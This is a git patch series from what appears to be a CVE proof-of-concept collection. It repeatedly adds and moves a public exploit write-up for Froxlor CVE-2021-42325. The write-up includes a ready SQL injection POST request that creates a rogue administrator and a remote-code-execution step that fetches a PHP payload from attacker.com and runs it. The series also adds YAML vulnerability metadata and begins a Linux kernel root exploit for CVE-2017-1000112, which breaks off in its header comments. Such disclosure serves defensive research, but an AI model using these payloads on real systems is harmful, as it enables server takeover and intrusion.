b/cve/Froxlor/2021/CVE-2021-42325/.keep deleted file mode 100644 index e69de29b..00000000 From 9ff1b571886ceb2c21fb54e81d13065075227e8c Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:51:28 +0000 Subject: [PATCH 052/109] add cve/Froxlor/2021/README.md. Signed-off-by: wangyue --- cve/Froxlor/2021/README.md | 89 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 cve/Froxlor/2021/README.md diff --git a/cve/Froxlor/2021/README.md b/cve/Froxlor/2021/README.md new file mode 100644 index 00000000..3a4391d3 --- /dev/null +++ b/cve/Froxlor/2021/README.md @@ -0,0 +1,89 @@ +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + + +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled + +### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + The following is a POST request example of running the payload provided, resulting in an administrator account being created + + +``` +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 +s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 + +``` + + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command + +### 3. Vulnerable resources and parameters + /customer_mysql.php (POST field: custom_suffix) + + +### 4. Payloads + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php + +### 5. Timeline + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure + +### 6. References: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From 6af918b21555980eaa15e866f6826839e0622746 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:51:41 +0000 Subject: [PATCH 053/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/.keep diff --git a/cve/Froxlor/2021/.keep b/cve/Froxlor/2021/.keep deleted file mode 100644 index e69de29b..00000000 From c118d55c7257a92f187717dfa5c466c2a369b951 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:17 +0000 Subject: [PATCH 054/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep new file mode 100644 index 00000000..e69de29b From 659ade8b9a5ff2fed0d7bcab24a77e129566f602 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:44 +0000 Subject: [PATCH 055/109] add cve/Froxlor/2021/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2021/CVE-2021-42325/README.md | 89 +++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/README.md diff --git a/cve/Froxlor/2021/CVE-2021-42325/README.md b/cve/Froxlor/2021/CVE-2021-42325/README.md new file mode 100644 index 00000000..3a4391d3 --- /dev/null +++ b/cve/Froxlor/2021/CVE-2021-42325/README.md @@ -0,0 +1,89 @@ +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + + +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled + +### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + The following is a POST request example of running the payload provided, resulting in an administrator account being created + + +``` +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 +s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 + +``` + + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command + +### 3. Vulnerable resources and parameters + /customer_mysql.php (POST field: custom_suffix) + + +### 4. Payloads + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php + +### 5. Timeline + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure + +### 6. References: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From d04981ce94c09e2f8eaef8c00712e7dddcd0dc30 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:55 +0000 Subject: [PATCH 056/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/README.md | 89 -------------------------------------- 1 file changed, 89 deletions(-) delete mode 100644 cve/Froxlor/2021/README.md diff --git a/cve/Froxlor/2021/README.md b/cve/Froxlor/2021/README.md deleted file mode 100644 index 3a4391d3..00000000 --- a/cve/Froxlor/2021/README.md +++ /dev/null @@ -1,89 +0,0 @@ -- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -- Exploit Author: Martin Cernac -- Date: 2021-11-05 -- Vendor: Froxlor (https://froxlor.org/) -- Software Link: https://froxlor.org/download.php -- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -- Patched Version: 0.10.30 -- Category: Web Application -- Tested on: Ubuntu -- CVE: 2021-42325 - - -### 1. Technical Description: -Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. - -#### 1.1 Pre-requisites - - Access to a customer account - - Ability to specify database name when creating a database - - Feature only availible from 0.10.28 onward and must be manually enabled - -### 2. Proof Of Concept (PoC): - -The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -#### 2.1 Privilege Escalation - - - Sign into Froxlor as a customer - - View your databases - - Create a database - - Put your payload into the "User/Database name" field (if enabled) - - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created - - -``` -POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 -Host: localhost -Content-Type: application/x-www-form-urlencoded -Content-Length: 448 -s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 - -``` - - -#### 2.2 Remote Code Execution - - To achieve RCE as root: - - - Sign into Froxlor as the newly created admin account (payload example creds are x:a) - - Go to System Settings - - Go to Webserver settings - - Adjust "Webserver reload command" field to a custom command - - The command must not contain any of the following special characters: ;|&><`$~? - - For details, see "safe_exec" function in lib/Froxlor/FileDir.php - - For example commands see Payloads 4.2 section - - Trigger configuration file rebuild - - Use menu item "Rebuild config files" - - Await a root cron job to execute your command - -### 3. Vulnerable resources and parameters - /customer_mysql.php (POST field: custom_suffix) - - -### 4. Payloads - -#### 4.1 SQL Injection payload - The following payload creates a new Froxlor admin with full access to all customers and the server configuration - The credentials are: - - username: x - - password: a - - `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- - - -#### 4.2 Remote Code Execution payload - Two part payload: - - wget http://attacker.com/malicious.txt -O /runme.php - - php /runme.php - -### 5. Timeline - 2021-10-11 Discovery - 2021-10-11 Contact with developer - 2021-10-11 Patch issued but no release rolled out - 2021-10-12 Reserved CVE-2021-42325 - 2021-11-05 Fix release rolled out - 2021-11-07 Public disclosure - -### 6. References: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From 38a60650529a959d073402cb6155d6fd425dfd10 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:53:13 +0000 Subject: [PATCH 057/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/yaml/.keep diff --git a/cve/Froxlor/2021/yaml/.keep b/cve/Froxlor/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b From 3e3f1b8fcbf94254d26c46ab167d5ec8755a488e Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:03 +0000 Subject: [PATCH 058/109] add cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cve/Froxlor/2021/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml new file mode 100644 index 00000000..f39d1ec1 --- /dev/null +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-42325 +source: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 +info: + name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 + severity: high + description: + Froxlor是Froxlor团队的一套轻量级服务器管理软件。 + Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 + scope-of-influence: + Froxlor 0.9~0.10.30 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 + - https://avd.aliyun.com/detail?id=AVD-2021-42325 + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - https://www.exploit-db.com/exploits/50502 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-42325 + cwe-id: CWE-89 + cnvd-id: None + kve-id: None + tags: exploit, remote, code execution, sql injection \ No newline at end of file From eb63db617d9aae2c0bf07cf67ba6a29a2af07c9b Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:28 +0000 Subject: [PATCH 059/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2023/CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/CVE-2021-42325/README.md | 89 ----------------------- 1 file changed, 89 deletions(-) delete mode 100644 cve/Froxlor/2023/CVE-2021-42325/README.md diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md deleted file mode 100644 index c1b38e2e..00000000 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ /dev/null @@ -1,89 +0,0 @@ -- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -- Exploit Author: Martin Cernac -- Date: 2021-11-05 -- Vendor: Froxlor (https://froxlor.org/) -- Software Link: https://froxlor.org/download.php -- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -- Patched Version: 0.10.30 -- Category: Web Application -- Tested on: Ubuntu -- CVE: 2021-42325 - - -### 1. Technical Description: -Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. - -#### 1.1 Pre-requisites - - Access to a customer account - - Ability to specify database name when creating a database - - Feature only availible from 0.10.28 onward and must be manually enabled - -### 2. Proof Of Concept (PoC): - -The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -#### 2.1 Privilege Escalation - - - Sign into Froxlor as a customer - - View your databases - - Create a database - - Put your payload into the "User/Database name" field (if enabled) - - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created - - -``` -POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 -Host: localhost -Content-Type: application/x-www-form-urlencoded -Content-Length: 448 -s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 - -``` - - -#### 2.2 Remote Code Execution - - To achieve RCE as root: - - - Sign into Froxlor as the newly created admin account (payload example creds are x:a) - - Go to System Settings - - Go to Webserver settings - - Adjust "Webserver reload command" field to a custom command - - The command must not contain any of the following special characters: ;|&><`$~? - - For details, see "safe_exec" function in lib/Froxlor/FileDir.php - - For example commands see Payloads 4.2 section - - Trigger configuration file rebuild - - Use menu item "Rebuild config files" - - Await a root cron job to execute your command - -### 3. Vulnerable resources and parameters - /customer_mysql.php (POST field: custom_suffix) - - -### 4. Payloads - -#### 4.1 SQL Injection payload - The following payload creates a new Froxlor admin with full access to all customers and the server configuration - The credentials are: - - username: x - - password: a - - `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- - - -#### 4.2 Remote Code Execution payload - Two part payload: - - wget http://attacker.com/malicious.txt -O /runme.php - - php /runme.php - -### 5. Timeline - 2021-10-11 Discovery - 2021-10-11 Contact with developer - 2021-10-11 Patch issued but no release rolled out - 2021-10-12 Reserved CVE-2021-42325 - 2021-11-05 Fix release rolled out - 2021-11-07 Public disclosure - -### 6. References: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file From f7ae36f2ba53a9a183b5a790ee73ea626607616b Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:44 +0000 Subject: [PATCH 060/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2023/yaml/CVE-2021-42325.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 25 ----------------------- 1 file changed, 25 deletions(-) delete mode 100644 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml deleted file mode 100644 index f7274053..00000000 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2021-42325 -source: - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 -info: - name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 - severity: 高危 - description: | - Froxlor是Froxlor团队的一套轻量级服务器管理软件。 - Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 - scope-of-influence: - Froxlor 0.9~0.10.30 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - - https://avd.aliyun.com/detail?id=AVD-2021-42325 - - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - - https://www.exploit-db.com/exploits/50502 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-42325 - cwe-id: CWE-89 - cnvd-id: None - kve-id: None - tags: exploit, remote, code execution, sql injection \ No newline at end of file From 4011482b3ba8aaf83e9c2b1bfa30aba79eaed3fe Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:56 +0000 Subject: [PATCH 061/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/yaml/.keep diff --git a/cve/Froxlor/2021/yaml/.keep b/cve/Froxlor/2021/yaml/.keep deleted file mode 100644 index e69de29b..00000000 From ecfa45a77fdf3176ddaa33b6e24e0d6512aab484 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:04:12 +0000 Subject: [PATCH 062/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/CVE-2021-42325/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep deleted file mode 100644 index e69de29b..00000000 From 2735baf65f2b3bfda917cd9b23fc4663e1ac732a Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:07:42 +0000 Subject: [PATCH 063/109] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index f39d1ec1..f25a97e3 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -12,8 +12,8 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 - - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - https://www.exploit-db.com/exploits/50502 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H From de016a975a05494023b0732c972a1500cc68e350 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 03:22:07 +0000 Subject: [PATCH 064/109] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index f25a97e3..1d02f52c 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 + https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42325.json info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high From 3a85270017516e90bb6abb75b384a54613a48c84 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 03:26:24 +0000 Subject: [PATCH 065/109] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index 1d02f52c..7cd4ff5e 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42325.json + https://www.exploit-db.com/exploits/50502 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -14,7 +14,6 @@ info: - https://avd.aliyun.com/detail?id=AVD-2021-42325 - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - - https://www.exploit-db.com/exploits/50502 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 From a5bed1a013779fa68e07a11b7e2735bd17363baa Mon Sep 17 00:00:00 2001 From: zhangqianyun Date: Fri, 7 Apr 2023 18:04:34 +0800 Subject: [PATCH 066/109] Add CVE-2017-1000112 --- .../2017/CVE-2017-1000112/README.md | 5 + cve/linux-kernel/2017/CVE-2017-1000112/poc.c | 668 ++++++++++++++++++ .../2017/yaml/CVE-2017-1000112.yaml | 20 + openkylin_list.yaml | 1 + 4 files changed, 694 insertions(+) create mode 100644 cve/linux-kernel/2017/CVE-2017-1000112/README.md create mode 100644 cve/linux-kernel/2017/CVE-2017-1000112/poc.c create mode 100644 cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml diff --git a/cve/linux-kernel/2017/CVE-2017-1000112/README.md b/cve/linux-kernel/2017/CVE-2017-1000112/README.md new file mode 100644 index 00000000..7299a9af --- /dev/null +++ b/cve/linux-kernel/2017/CVE-2017-1000112/README.md @@ -0,0 +1,5 @@ +CVE-2017-1000112 +================ + +This is a proof-of-concept Local Privelege Escalation exploit for [CVE-2017-1000112](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000112) — a memory corruption vulnerability I found in the UDP Fragmentation Offload feature of the Linux kernel IP sockets. +See the details in [CVE-2017-1000112: Exploiting an out-of-bounds bug in the Linux kernel UFO packets](https://xairy.io/articles/2017/cve-2017-1000112). diff --git a/cve/linux-kernel/2017/CVE-2017-1000112/poc.c b/cve/linux-kernel/2017/CVE-2017-1000112/poc.c new file mode 100644 index 00000000..94732769 --- /dev/null +++ b/cve/linux-kernel/2017/CVE-2017-1000112/poc.c @@ -0,0 +1,668 @@ +// A proof-of-concept local root exploit for CVE-2017-1000112. +// Includes KASLR and SMEP bypasses. No SMAP bypass. +// Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels. +// +// Usage: +// user@ubuntu:~$ uname -a +// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +// user@ubuntu:~$ whoami +// user +// user@ubuntu:~$ id +// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) +// user@ubuntu:~$ gcc pwn.c -o pwn +// user@ubuntu:~$ ./pwn +// [.] starting +// [.] checking distro and kernel versions +// [.] kernel version '4.8.0-58-generic' detected +// [~] done, versions looks good +// [.] checking SMEP and SMAP +// [~] done, looks good +// [.] setting up namespace sandbox +// [~] done, namespace sandbox set up +// [.] KASLR bypass enabled, getting kernel addr +// [~] done, kernel text: ffffffffae400000 +// [.] 